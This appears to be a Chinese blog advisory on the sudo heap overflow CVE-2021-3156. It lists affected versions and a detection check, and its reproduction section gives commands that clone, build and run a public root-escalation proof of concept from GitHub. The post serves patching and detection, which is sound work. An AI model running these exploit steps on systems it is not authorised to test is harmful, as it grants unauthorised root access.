Linux sudo堆溢出漏洞(CVE-2021-3156)

2021年1月27日,RedHat警告了一个sudo漏洞,允许普通用户无认证获取root权限。影响版本包括1.8.2-1.8.31p2和1.9.0-1.9.5p1。漏洞POC已公开,Linux管理员应紧急修复。复现步骤包括从GitHub克隆PoC并执行特定命令。检测方法是通过非root用户运行`sudoedit-s/`,异常响应提示漏洞存在或已修补。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞描述:

2021年01月27日,RedHat官方发布了sudo 缓冲区/栈溢出漏洞的风险通告,普通用户可以通过利用此漏洞,而无需进行身份验证,成功获取root权限。漏洞POC已在互联网上公开,提醒Linux系统管理员尽快修复。

漏洞级别: 高危

受影响的版本:

sudo: 1.8.2 - 1.8.31p2

sudo: 1.9.0 - 1.9.5p1

漏洞复现:

git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
make
./sudo-hax-me-a-sandwich 1 

Kali Linux 复现:

ubuntu-20.04.1 复现:

检测方法:

以非root用户登录系统,并运行如下命令:

sudoedit -s / 

- 如果响应一个以sudoedit:开头的报错,那么表明存在漏洞。

[admin@Q01 ~]$ sudoedit -s /
sudoedit: /: not a regular file 

- 如果响应一个以usage:开头的报错,那么表明补丁已经生效。

[admin@Q02 ~]$ sudoedit -s /
usage: sudoedit [-AknS] [-C num] [-D directory] [-g group] [-h host] [-p prompt] [-R directory] [-T timeout] [-u user] file ... 
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值